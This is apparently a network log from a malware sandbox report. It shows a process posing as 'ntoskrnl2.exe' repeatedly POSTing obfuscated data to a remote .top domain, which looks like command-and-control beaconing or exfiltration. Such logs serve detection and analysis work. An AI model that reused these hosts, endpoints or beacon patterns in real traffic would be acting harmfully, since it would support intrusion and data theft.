                                                            Data Ascii: ##B/U18#)_.[(;:#'9Z+2&19=+2!$ [% "&(>0-67>&Q0.871->11:<=1>*V8V(/&\ $##^=45$$3(')T';P)=+_$)1Z#U!T:9$P.-V0WS


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            44 | 192.168.2.6 | 49791 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:23.637940884 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:23.996737003 CEST | 1028 | OUT | Data Raw: 50 52 5a 54 5e 45 5c 53 5b 5f 56 5a 57 5e 50 58 55 5b 5e 45 50 5e 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PRZT^E\S[_VZW^PXU[^EP^Z^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$01:<($!9%-%<_8$$Z&?5S?;<W=4$Z?!:Y:*%^./]+$
                                                            Sep 2, 2024 13:34:24.310518980 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:24.527663946 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:23 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            45 | 192.168.2.6 | 49792 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:24.657411098 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:25.009516001 CEST | 1028 | OUT | Data Raw: 55 55 5f 51 5e 40 5c 57 5b 5f 56 5a 57 5e 50 5c 55 5d 5e 45 50 5c 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UU_Q^@\W[_VZW^P\U]^EP\ZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'X3!9_?320=*Y(=8-74Y3<)U((<U>(X=1":*%^./]+$
                                                            Sep 2, 2024 13:34:25.302304983 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:25.433855057 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:24 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            46 | 192.168.2.6 | 49793 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:26.490762949 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:26.837310076 CEST | 1028 | OUT | Data Raw: 50 55 5f 51 5b 45 5c 51 5b 5f 56 5a 57 5f 50 59 55 5e 5e 42 50 53 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PU_Q[E\Q[_VZW_PYU^^BPSZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'^&1.(+<'5^$&<-8'4[3,V(8)$)25:%^./]+
                                                            Sep 2, 2024 13:34:27.134881020 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:27.348201990 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            47 | 192.168.2.6 | 49794 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:27.498933077 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:27.853112936 CEST | 1028 | OUT | Data Raw: 50 55 5a 5f 5e 42 59 55 5b 5f 56 5a 57 54 50 52 55 59 5e 47 50 5d 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PUZ_^BYU[_VZWTPRUY^GP]ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$'9_?8'01:'(>#/7'<:?(()$3?2&_9:%^./]+
                                                            Sep 2, 2024 13:34:28.162817955 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:28.364295006 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:27 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            48 | 192.168.2.6 | 49795 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:28.586710930 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:28.931453943 CEST | 1028 | OUT | Data Raw: 50 55 5a 52 5e 46 5c 54 5b 5f 56 5a 57 5c 50 5a 55 5f 5e 46 50 5e 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PUZR^F\T[_VZW\PZU_^FP^ZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'[319<8'^3%=-?\;$''/=S(; V*4Z="5.%^./]+,
                                                            Sep 2, 2024 13:34:29.239969015 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:29.367033005 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:28 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            49 | 192.168.2.6 | 49796 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:29.502262115 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:29.855134010 CEST | 1028 | OUT | Data Raw: 50 53 5a 51 5e 44 59 54 5b 5f 56 5a 57 58 50 5d 55 5f 5e 48 50 5c 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PSZQ^DYT[_VZWXP]U_^HP\ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$3=\+#06'.&?=7-'+3<T<^8U*3=!9-%^./]+<
                                                            Sep 2, 2024 13:34:30.156847000 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:30.283543110 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:29 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            50 | 192.168.2.6 | 49797 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:29.545577049 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:29.899835110 CEST | 1340 | OUT | Data Raw: 50 55 5a 50 5b 42 5c 53 5b 5f 56 5a 57 5b 50 5c 55 58 5e 43 50 5d 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PUZP[B\S[_VZW[P\UX^CP]Z_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'$!1\(+^0"$-6]>-;; 3?6*;0)8Y?1.:%^./]+0
                                                            Sep 2, 2024 13:34:30.211570024 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:30.441332102 CEST | 308 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:29 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 20 54 34 27 27 57 25 02 2c 1d 2a 00 26 12 28 3d 05 1d 2d 01 20 1f 27 39 09 59 3f 0c 0b 18 25 39 25 13 2b 3c 08 05 2b 31 25 53 22 24 20 5b 03 1f 26 03 34 54 36 13 25 3b 3d 5b 27 34 31 07 20 24 2f 07 3e 3e 2e 18 24 13 16 58 23 22 3a 51 2f 5b 39 0b 31 3b 3b 03 3a 02 31 07 32 3e 2a 56 08 16 38 55 3f 3c 29 04 20 24 28 02 34 38 2a 0b 23 18 24 08 27 0d 2f 54 27 2a 04 0a 25 2e 33 57 29 5b 23 5c 24 00 21 5d 23 1d 07 1b 2d 39 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: T4''W%,*&(=- '9Y?%9%+<+1%S"$ [&4T6%;=['41 $/>>.$X#":Q/[91;;:12>*V8U?<) $(48*#$'/T'*%.3W)[#\$!]#-9$P.-V0WS


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            51 | 192.168.2.6 | 49798 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:30.438664913 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:30.790513039 CEST | 1028 | OUT | Data Raw: 50 51 5a 55 5b 45 59 50 5b 5f 56 5a 57 54 50 5b 55 5a 5e 40 50 5c 5a 5c 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PQZU[EYP[_VZWTP[UZ^@P\Z\YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Y3!Y(4'63:]>-$,$3W*+/*B')-.%^./]+
                                                            Sep 2, 2024 13:34:31.112586975 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:31.246515036 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:30 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            52 | 192.168.2.6 | 49799 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:31.387963057 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:31.743793011 CEST | 1028 | OUT | Data Raw: 55 5f 5a 53 5b 43 5c 50 5b 5f 56 5a 57 58 50 58 55 5a 5e 46 50 5c 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U_ZS[C\P[_VZWXPXUZ^FP\ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'X&2.<+(32$>:X? ]-78\&?%T(/)(_?!6.%^./]+<
                                                            Sep 2, 2024 13:34:32.035018921 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:32.165390015 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:31 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            53 | 192.168.2.6 | 49800 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:32.333511114 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:32.681128025 CEST | 1028 | OUT | Data Raw: 55 54 5a 52 5e 41 59 52 5b 5f 56 5a 57 54 50 5a 55 58 5e 41 50 5b 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UTZR^AYR[_VZWTPZUX^AP[ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$3!2(?02:$>:(/?3?&?(<P)[>">].*%^./]+
                                                            Sep 2, 2024 13:34:32.997924089 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:33.122889042 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:32 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            54 | 192.168.2.6 | 49801 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:33.246026039 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:33.606214046 CEST | 1028 | OUT | Data Raw: 55 54 5a 55 5b 41 59 53 5b 5f 56 5a 57 5f 50 52 55 5f 5e 43 50 58 5a 5d 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UTZU[AYS[_VZW_PRU_^CPXZ]YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Z$!&<80^$.6^?. 87($9S<0T*B'>W"Y-:%^./]+
                                                            Sep 2, 2024 13:34:33.901288033 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:34.055578947 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:33 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            55 | 192.168.2.6 | 49802 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:34.192039967 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:34.540631056 CEST | 1024 | OUT | Data Raw: 50 51 5a 52 5e 43 5c 50 5b 5f 56 5a 57 5d 50 53 55 50 5e 44 50 5a 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PQZR^C\P[_VZW]PSUP^DPZZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'^3!Y+;3!_$-6<-?,$]3/)?8*4#=5.%^./]+
                                                            Sep 2, 2024 13:34:34.847290039 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:35.909945011 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:34 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:34:35.910060883 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:34 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:34:35.911027908 CEST | 183 | IN | HTTP/1.1 100 Continue
                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 30 32 20 53 65 70 20 32 30 32 34 20 31 31 3a 33 34 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 31 56 59 5a
                                                            Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Mon, 02 Sep 2024 11:34:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive1VYZ
                                                            Sep 2, 2024 13:34:36.117063046 CEST | 183 | IN | HTTP/1.1 100 Continue
                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 30 32 20 53 65 70 20 32 30 32 34 20 31 31 3a 33 34 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 31 56 59 5a
                                                            Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Mon, 02 Sep 2024 11:34:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            56 | 192.168.2.6 | 49803 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:36.117806911 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1324
                                                            Expect: 100-continue
